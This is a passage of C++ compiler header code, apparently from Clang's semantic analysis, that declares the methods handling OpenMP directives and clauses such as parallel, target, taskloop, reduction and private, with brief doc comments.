/// for \p FD based on DSA for the provided corresponding captured declaration
/// \p D.
void setOpenMPCaptureKind(FieldDecl *FD, const ValueDecl *D, unsigned Level);
/// Check if the specified variable is captured by 'target' directive.
/// \param Level Relative level of nested OpenMP construct for that the check
/// is performed.
bool isOpenMPTargetCapturedDecl(const ValueDecl *D, unsigned Level) const;
ExprResult PerformOpenMPImplicitIntegerConversion(SourceLocation OpLoc,
Expr *Op);
/// Called on start of new data sharing attribute block.
void StartOpenMPDSABlock(OpenMPDirectiveKind K,
const DeclarationNameInfo &DirName, Scope *CurScope,
SourceLocation Loc);
/// Start analysis of clauses.
void StartOpenMPClause(OpenMPClauseKind K);
/// End analysis of clauses.
void EndOpenMPClause();
/// Called on end of data sharing attribute block.
void EndOpenMPDSABlock(Stmt *CurDirective);
/// Check if the current region is an OpenMP loop region and if it is,
/// mark loop control variable, used in \p Init for loop initialization, as
/// private by default.
/// \param Init First part of the for loop.
void ActOnOpenMPLoopInitialization(SourceLocation ForLoc, Stmt *Init);
// OpenMP directives and clauses.
/// Called on correct id-expression from the '#pragma omp
/// threadprivate'.
ExprResult ActOnOpenMPIdExpression(Scope *CurScope, CXXScopeSpec &ScopeSpec,
const DeclarationNameInfo &Id,
OpenMPDirectiveKind Kind);
/// Called on well-formed '#pragma omp threadprivate'.
DeclGroupPtrTy ActOnOpenMPThreadprivateDirective(
SourceLocation Loc,
ArrayRef<Expr *> VarList);
/// Builds a new OpenMPThreadPrivateDecl and checks its correctness.
OMPThreadPrivateDecl *CheckOMPThreadPrivateDecl(SourceLocation Loc,
ArrayRef<Expr *> VarList);
/// Called on well-formed '#pragma omp allocate'.
DeclGroupPtrTy ActOnOpenMPAllocateDirective(SourceLocation Loc,
ArrayRef<Expr *> VarList,
ArrayRef<OMPClause *> Clauses,
DeclContext *Owner = nullptr);
/// Called on well-formed '#pragma omp requires'.
DeclGroupPtrTy ActOnOpenMPRequiresDirective(SourceLocation Loc,
ArrayRef<OMPClause *> ClauseList);
/// Check restrictions on Requires directive
OMPRequiresDecl *CheckOMPRequiresDecl(SourceLocation Loc,
ArrayRef<OMPClause *> Clauses);
/// Check if the specified type is allowed to be used in 'omp declare
/// reduction' construct.
QualType ActOnOpenMPDeclareReductionType(SourceLocation TyLoc,
TypeResult ParsedType);
/// Called on start of '#pragma omp declare reduction'.
DeclGroupPtrTy ActOnOpenMPDeclareReductionDirectiveStart(
Scope *S, DeclContext *DC, DeclarationName Name,
ArrayRef<std::pair<QualType, SourceLocation>> ReductionTypes,
AccessSpecifier AS, Decl *PrevDeclInScope = nullptr);
/// Initialize declare reduction construct initializer.
void ActOnOpenMPDeclareReductionCombinerStart(Scope *S, Decl *D);
/// Finish current declare reduction construct initializer.
void ActOnOpenMPDeclareReductionCombinerEnd(Decl *D, Expr *Combiner);
/// Initialize declare reduction construct initializer.
/// \return omp_priv variable.
VarDecl *ActOnOpenMPDeclareReductionInitializerStart(Scope *S, Decl *D);
/// Finish current declare reduction construct initializer.
void ActOnOpenMPDeclareReductionInitializerEnd(Decl *D, Expr *Initializer,
VarDecl *OmpPrivParm);
/// Called at the end of '#pragma omp declare reduction'.
DeclGroupPtrTy ActOnOpenMPDeclareReductionDirectiveEnd(
Scope *S, DeclGroupPtrTy DeclReductions, bool IsValid);
/// Check variable declaration in 'omp declare mapper' construct.
TypeResult ActOnOpenMPDeclareMapperVarDecl(Scope *S, Declarator &D);
/// Check if the specified type is allowed to be used in 'omp declare
/// mapper' construct.
QualType ActOnOpenMPDeclareMapperType(SourceLocation TyLoc,
TypeResult ParsedType);
/// Called on start of '#pragma omp declare mapper'.
OMPDeclareMapperDecl *ActOnOpenMPDeclareMapperDirectiveStart(
Scope *S, DeclContext *DC, DeclarationName Name, QualType MapperType,
SourceLocation StartLoc, DeclarationName VN, AccessSpecifier AS,
Decl *PrevDeclInScope = nullptr);
/// Build the mapper variable of '#pragma omp declare mapper'.
void ActOnOpenMPDeclareMapperDirectiveVarDecl(OMPDeclareMapperDecl *DMD,
Scope *S, QualType MapperType,
SourceLocation StartLoc,
DeclarationName VN);
/// Called at the end of '#pragma omp declare mapper'.
DeclGroupPtrTy
ActOnOpenMPDeclareMapperDirectiveEnd(OMPDeclareMapperDecl *D, Scope *S,
ArrayRef<OMPClause *> ClauseList);
/// Called on the start of target region i.e. '#pragma omp declare target'.
bool ActOnStartOpenMPDeclareTargetDirective(SourceLocation Loc);
/// Called at the end of target region i.e. '#pragme omp end declare target'.
void ActOnFinishOpenMPDeclareTargetDirective();
/// Searches for the provided declaration name for OpenMP declare target
/// directive.
NamedDecl *
lookupOpenMPDeclareTargetName(Scope *CurScope, CXXScopeSpec &ScopeSpec,
const DeclarationNameInfo &Id,
NamedDeclSetType &SameDirectiveDecls);
/// Called on correct id-expression from the '#pragma omp declare target'.
void ActOnOpenMPDeclareTargetName(NamedDecl *ND, SourceLocation Loc,
OMPDeclareTargetDeclAttr::MapTypeTy MT,
OMPDeclareTargetDeclAttr::DevTypeTy DT);
/// Check declaration inside target region.
void
checkDeclIsAllowedInOpenMPTarget(Expr *E, Decl *D,
SourceLocation IdLoc = SourceLocation());
/// Return true inside OpenMP declare target region.
bool isInOpenMPDeclareTargetContext() const {
return DeclareTargetNestingLevel > 0;
}
/// Return true inside OpenMP target region.
bool isInOpenMPTargetExecutionDirective() const;
/// Return the number of captured regions created for an OpenMP directive.
static int getOpenMPCaptureLevels(OpenMPDirectiveKind Kind);
/// Initialization of captured region for OpenMP region.
void ActOnOpenMPRegionStart(OpenMPDirectiveKind DKind, Scope *CurScope);
/// End of OpenMP region.
///
/// \param S Statement associated with the current OpenMP region.
/// \param Clauses List of clauses for the current OpenMP region.
///
/// \returns Statement for finished OpenMP region.
StmtResult ActOnOpenMPRegionEnd(StmtResult S, ArrayRef<OMPClause *> Clauses);
StmtResult ActOnOpenMPExecutableDirective(
OpenMPDirectiveKind Kind, const DeclarationNameInfo &DirName,
OpenMPDirectiveKind CancelRegion, ArrayRef<OMPClause *> Clauses,
Stmt *AStmt, SourceLocation StartLoc, SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp parallel' after parsing
/// of the associated statement.
StmtResult ActOnOpenMPParallelDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt,
SourceLocation StartLoc,
SourceLocation EndLoc);
using VarsWithInheritedDSAType =
llvm::SmallDenseMap<const ValueDecl *, const Expr *, 4>;
/// Called on well-formed '\#pragma omp simd' after parsing
/// of the associated statement.
StmtResult
ActOnOpenMPSimdDirective(ArrayRef<OMPClause *> Clauses, Stmt *AStmt,
SourceLocation StartLoc, SourceLocation EndLoc,
VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp for' after parsing
/// of the associated statement.
StmtResult
ActOnOpenMPForDirective(ArrayRef<OMPClause *> Clauses, Stmt *AStmt,
SourceLocation StartLoc, SourceLocation EndLoc,
VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp for simd' after parsing
/// of the associated statement.
StmtResult
ActOnOpenMPForSimdDirective(ArrayRef<OMPClause *> Clauses, Stmt *AStmt,
SourceLocation StartLoc, SourceLocation EndLoc,
VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp sections' after parsing
/// of the associated statement.
StmtResult ActOnOpenMPSectionsDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp section' after parsing of the
/// associated statement.
StmtResult ActOnOpenMPSectionDirective(Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp single' after parsing of the
/// associated statement.
StmtResult ActOnOpenMPSingleDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp master' after parsing of the
/// associated statement.
StmtResult ActOnOpenMPMasterDirective(Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp critical' after parsing of the
/// associated statement.
StmtResult ActOnOpenMPCriticalDirective(const DeclarationNameInfo &DirName,
ArrayRef<OMPClause *> Clauses,
Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp parallel for' after parsing
/// of the associated statement.
StmtResult ActOnOpenMPParallelForDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp parallel for simd' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPParallelForSimdDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp parallel master' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPParallelMasterDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt,
SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp parallel sections' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPParallelSectionsDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt,
SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp task' after parsing of the
/// associated statement.
StmtResult ActOnOpenMPTaskDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp taskyield'.
StmtResult ActOnOpenMPTaskyieldDirective(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp barrier'.
StmtResult ActOnOpenMPBarrierDirective(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp taskwait'.
StmtResult ActOnOpenMPTaskwaitDirective(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp taskgroup'.
StmtResult ActOnOpenMPTaskgroupDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp flush'.
StmtResult ActOnOpenMPFlushDirective(ArrayRef<OMPClause *> Clauses,
SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp ordered' after parsing of the
/// associated statement.
StmtResult ActOnOpenMPOrderedDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp atomic' after parsing of the
/// associated statement.
StmtResult ActOnOpenMPAtomicDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp target' after parsing of the
/// associated statement.
StmtResult ActOnOpenMPTargetDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp target data' after parsing of
/// the associated statement.
StmtResult ActOnOpenMPTargetDataDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp target enter data' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPTargetEnterDataDirective(ArrayRef<OMPClause *> Clauses,
SourceLocation StartLoc,
SourceLocation EndLoc,
Stmt *AStmt);
/// Called on well-formed '\#pragma omp target exit data' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPTargetExitDataDirective(ArrayRef<OMPClause *> Clauses,
SourceLocation StartLoc,
SourceLocation EndLoc,
Stmt *AStmt);
/// Called on well-formed '\#pragma omp target parallel' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPTargetParallelDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt,
SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp target parallel for' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPTargetParallelForDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp teams' after parsing of the
/// associated statement.
StmtResult ActOnOpenMPTeamsDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp cancellation point'.
StmtResult
ActOnOpenMPCancellationPointDirective(SourceLocation StartLoc,
SourceLocation EndLoc,
OpenMPDirectiveKind CancelRegion);
/// Called on well-formed '\#pragma omp cancel'.
StmtResult ActOnOpenMPCancelDirective(ArrayRef<OMPClause *> Clauses,
SourceLocation StartLoc,
SourceLocation EndLoc,
OpenMPDirectiveKind CancelRegion);
/// Called on well-formed '\#pragma omp taskloop' after parsing of the
/// associated statement.
StmtResult
ActOnOpenMPTaskLoopDirective(ArrayRef<OMPClause *> Clauses, Stmt *AStmt,
SourceLocation StartLoc, SourceLocation EndLoc,
VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp taskloop simd' after parsing of
/// the associated statement.
StmtResult ActOnOpenMPTaskLoopSimdDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp master taskloop' after parsing of the
/// associated statement.
StmtResult ActOnOpenMPMasterTaskLoopDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp master taskloop simd' after parsing of
/// the associated statement.
StmtResult ActOnOpenMPMasterTaskLoopSimdDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp parallel master taskloop' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPParallelMasterTaskLoopDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp parallel master taskloop simd' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPParallelMasterTaskLoopSimdDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp distribute' after parsing
/// of the associated statement.
StmtResult
ActOnOpenMPDistributeDirective(ArrayRef<OMPClause *> Clauses, Stmt *AStmt,
SourceLocation StartLoc, SourceLocation EndLoc,
VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp target update'.
StmtResult ActOnOpenMPTargetUpdateDirective(ArrayRef<OMPClause *> Clauses,
SourceLocation StartLoc,
SourceLocation EndLoc,
Stmt *AStmt);
/// Called on well-formed '\#pragma omp distribute parallel for' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPDistributeParallelForDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp distribute parallel for simd'
/// after parsing of the associated statement.
StmtResult ActOnOpenMPDistributeParallelForSimdDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp distribute simd' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPDistributeSimdDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp target parallel for simd' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPTargetParallelForSimdDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp target simd' after parsing of
/// the associated statement.
StmtResult
ActOnOpenMPTargetSimdDirective(ArrayRef<OMPClause *> Clauses, Stmt *AStmt,
SourceLocation StartLoc, SourceLocation EndLoc,
VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp teams distribute' after parsing of
/// the associated statement.
StmtResult ActOnOpenMPTeamsDistributeDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp teams distribute simd' after parsing
/// of the associated statement.
StmtResult ActOnOpenMPTeamsDistributeSimdDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp teams distribute parallel for simd'
/// after parsing of the associated statement.
StmtResult ActOnOpenMPTeamsDistributeParallelForSimdDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp teams distribute parallel for'
/// after parsing of the associated statement.
StmtResult ActOnOpenMPTeamsDistributeParallelForDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp target teams' after parsing of the
/// associated statement.
StmtResult ActOnOpenMPTargetTeamsDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt,
SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp target teams distribute' after parsing
/// of the associated statement.
StmtResult ActOnOpenMPTargetTeamsDistributeDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp target teams distribute parallel for'
/// after parsing of the associated statement.
StmtResult ActOnOpenMPTargetTeamsDistributeParallelForDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp target teams distribute parallel for
/// simd' after parsing of the associated statement.
StmtResult ActOnOpenMPTargetTeamsDistributeParallelForSimdDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp target teams distribute simd' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPTargetTeamsDistributeSimdDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Checks correctness of linear modifiers.
bool CheckOpenMPLinearModifier(OpenMPLinearClauseKind LinKind,
SourceLocation LinLoc);
/// Checks that the specified declaration matches requirements for the linear
/// decls.
bool CheckOpenMPLinearDecl(const ValueDecl *D, SourceLocation ELoc,
OpenMPLinearClauseKind LinKind, QualType Type);
/// Called on well-formed '\#pragma omp declare simd' after parsing of
/// the associated method/function.
DeclGroupPtrTy ActOnOpenMPDeclareSimdDirective(
DeclGroupPtrTy DG, OMPDeclareSimdDeclAttr::BranchStateTy BS,
Expr *Simdlen, ArrayRef<Expr *> Uniforms, ArrayRef<Expr *> Aligneds,
ArrayRef<Expr *> Alignments, ArrayRef<Expr *> Linears,
ArrayRef<unsigned> LinModifiers, ArrayRef<Expr *> Steps, SourceRange SR);
/// Checks '\#pragma omp declare variant' variant function and original
/// functions after parsing of the associated method/function.
/// \param DG Function declaration to which declare variant directive is
/// applied to.
/// \param VariantRef Expression that references the variant function, which
/// must be used instead of the original one, specified in \p DG.
/// \returns None, if the function/variant function are not compatible with
/// the pragma, pair of original function/variant ref expression otherwise.
Optional<std::pair<FunctionDecl *, Expr *>> checkOpenMPDeclareVariantFunction(
DeclGroupPtrTy DG, Expr *VariantRef, SourceRange SR);
/// Called on well-formed '\#pragma omp declare variant' after parsing of
/// the associated method/function.
/// \param FD Function declaration to which declare variant directive is
/// applied to.
/// \param VariantRef Expression that references the variant function, which
/// must be used instead of the original one, specified in \p DG.
/// \param Data Set of context-specific data for the specified context
/// selector.
void ActOnOpenMPDeclareVariantDirective(FunctionDecl *FD, Expr *VariantRef,
SourceRange SR,
ArrayRef<OMPCtxSelectorData> Data);
OMPClause *ActOnOpenMPSingleExprClause(OpenMPClauseKind Kind,
Expr *Expr,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'allocator' clause.
OMPClause *ActOnOpenMPAllocatorClause(Expr *Allocator,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'if' clause.
OMPClause *ActOnOpenMPIfClause(OpenMPDirectiveKind NameModifier,
Expr *Condition, SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation NameModifierLoc,
SourceLocation ColonLoc,
SourceLocation EndLoc);
/// Called on well-formed 'final' clause.
OMPClause *ActOnOpenMPFinalClause(Expr *Condition, SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'num_threads' clause.
OMPClause *ActOnOpenMPNumThreadsClause(Expr *NumThreads,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'safelen' clause.
OMPClause *ActOnOpenMPSafelenClause(Expr *Length,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'simdlen' clause.
OMPClause *ActOnOpenMPSimdlenClause(Expr *Length, SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'collapse' clause.
OMPClause *ActOnOpenMPCollapseClause(Expr *NumForLoops,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'ordered' clause.
OMPClause *
ActOnOpenMPOrderedClause(SourceLocation StartLoc, SourceLocation EndLoc,
SourceLocation LParenLoc = SourceLocation(),
Expr *NumForLoops = nullptr);
/// Called on well-formed 'grainsize' clause.
OMPClause *ActOnOpenMPGrainsizeClause(Expr *Size, SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'num_tasks' clause.
OMPClause *ActOnOpenMPNumTasksClause(Expr *NumTasks, SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'hint' clause.
OMPClause *ActOnOpenMPHintClause(Expr *Hint, SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
OMPClause *ActOnOpenMPSimpleClause(OpenMPClauseKind Kind,
unsigned Argument,
SourceLocation ArgumentLoc,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'default' clause.
OMPClause *ActOnOpenMPDefaultClause(OpenMPDefaultClauseKind Kind,
SourceLocation KindLoc,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'proc_bind' clause.
OMPClause *ActOnOpenMPProcBindClause(llvm::omp::ProcBindKind Kind,
SourceLocation KindLoc,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
OMPClause *ActOnOpenMPSingleExprWithArgClause(
OpenMPClauseKind Kind, ArrayRef<unsigned> Arguments, Expr *Expr,
SourceLocation StartLoc, SourceLocation LParenLoc,
ArrayRef<SourceLocation> ArgumentsLoc, SourceLocation DelimLoc,
SourceLocation EndLoc);
/// Called on well-formed 'schedule' clause.
OMPClause *ActOnOpenMPScheduleClause(
OpenMPScheduleClauseModifier M1, OpenMPScheduleClauseModifier M2,
OpenMPScheduleClauseKind Kind, Expr *ChunkSize, SourceLocation StartLoc,
SourceLocation LParenLoc, SourceLocation M1Loc, SourceLocation M2Loc,
SourceLocation KindLoc, SourceLocation CommaLoc, SourceLocation EndLoc);
OMPClause *ActOnOpenMPClause(OpenMPClauseKind Kind, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'nowait' clause.
OMPClause *ActOnOpenMPNowaitClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'untied' clause.
OMPClause *ActOnOpenMPUntiedClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'mergeable' clause.
OMPClause *ActOnOpenMPMergeableClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'read' clause.
OMPClause *ActOnOpenMPReadClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'write' clause.
OMPClause *ActOnOpenMPWriteClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'update' clause.
OMPClause *ActOnOpenMPUpdateClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'capture' clause.
OMPClause *ActOnOpenMPCaptureClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'seq_cst' clause.
OMPClause *ActOnOpenMPSeqCstClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'threads' clause.
OMPClause *ActOnOpenMPThreadsClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'simd' clause.
OMPClause *ActOnOpenMPSIMDClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'nogroup' clause.
OMPClause *ActOnOpenMPNogroupClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'unified_address' clause.
OMPClause *ActOnOpenMPUnifiedAddressClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'unified_address' clause.
OMPClause *ActOnOpenMPUnifiedSharedMemoryClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'reverse_offload' clause.
OMPClause *ActOnOpenMPReverseOffloadClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'dynamic_allocators' clause.
OMPClause *ActOnOpenMPDynamicAllocatorsClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'atomic_default_mem_order' clause.
OMPClause *ActOnOpenMPAtomicDefaultMemOrderClause(
OpenMPAtomicDefaultMemOrderClauseKind Kind, SourceLocation KindLoc,
SourceLocation StartLoc, SourceLocation LParenLoc, SourceLocation EndLoc);
OMPClause *ActOnOpenMPVarListClause(
OpenMPClauseKind Kind, ArrayRef<Expr *> Vars, Expr *TailExpr,
const OMPVarListLocTy &Locs, SourceLocation ColonLoc,
CXXScopeSpec &ReductionOrMapperIdScopeSpec,
DeclarationNameInfo &ReductionOrMapperId, int ExtraModifier,
ArrayRef<OpenMPMapModifierKind> MapTypeModifiers,
ArrayRef<SourceLocation> MapTypeModifiersLoc, bool IsMapTypeImplicit,
SourceLocation DepLinMapLastLoc);
/// Called on well-formed 'allocate' clause.
OMPClause *
ActOnOpenMPAllocateClause(Expr *Allocator, ArrayRef<Expr *> VarList,
SourceLocation StartLoc, SourceLocation ColonLoc,
SourceLocation LParenLoc, SourceLocation EndLoc);
/// Called on well-formed 'private' clause.
OMPClause *ActOnOpenMPPrivateClause(ArrayRef<Expr *> VarList,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'firstprivate' clause.
OMPClause *ActOnOpenMPFirstprivateClause(ArrayRef<Expr *> VarList,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'lastprivate' clause.
OMPClause *ActOnOpenMPLastprivateClause(
ArrayRef<Expr *> VarList, OpenMPLastprivateModifier LPKind,
SourceLocation LPKindLoc, SourceLocation ColonLoc,
SourceLocation StartLoc, SourceLocation LParenLoc, SourceLocation EndLoc);
/// Called on well-formed 'shared' clause.
OMPClause *ActOnOpenMPSharedClause(ArrayRef<Expr *> VarList,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'reduction' clause.
OMPClause *ActOnOpenMPReductionClause(
ArrayRef<Expr *> VarList, SourceLocation StartLoc,
SourceLocation LParenLoc, SourceLocation ColonLoc, SourceLocation EndLoc,
CXXScopeSpec &ReductionIdScopeSpec,
const DeclarationNameInfo &ReductionId,
ArrayRef<Expr *> UnresolvedReductions = llvm::None);
/// Called on well-formed 'task_reduction' clause.
OMPClause *ActOnOpenMPTaskReductionClause(
ArrayRef<Expr *> VarList, SourceLocation StartLoc,
SourceLocation LParenLoc, SourceLocation ColonLoc, SourceLocation EndLoc,
CXXScopeSpec &ReductionIdScopeSpec,
const DeclarationNameInfo &ReductionId,
ArrayRef<Expr *> UnresolvedReductions = llvm::None);
/// Called on well-formed 'in_reduction' clause.
OMPClause *ActOnOpenMPInReductionClause(
ArrayRef<Expr *> VarList, SourceLocation StartLoc,
SourceLocation LParenLoc, SourceLocation ColonLoc, SourceLocation EndLoc,
CXXScopeSpec &ReductionIdScopeSpec,
const DeclarationNameInfo &ReductionId,
ArrayRef<Expr *> UnresolvedReductions = llvm::None);
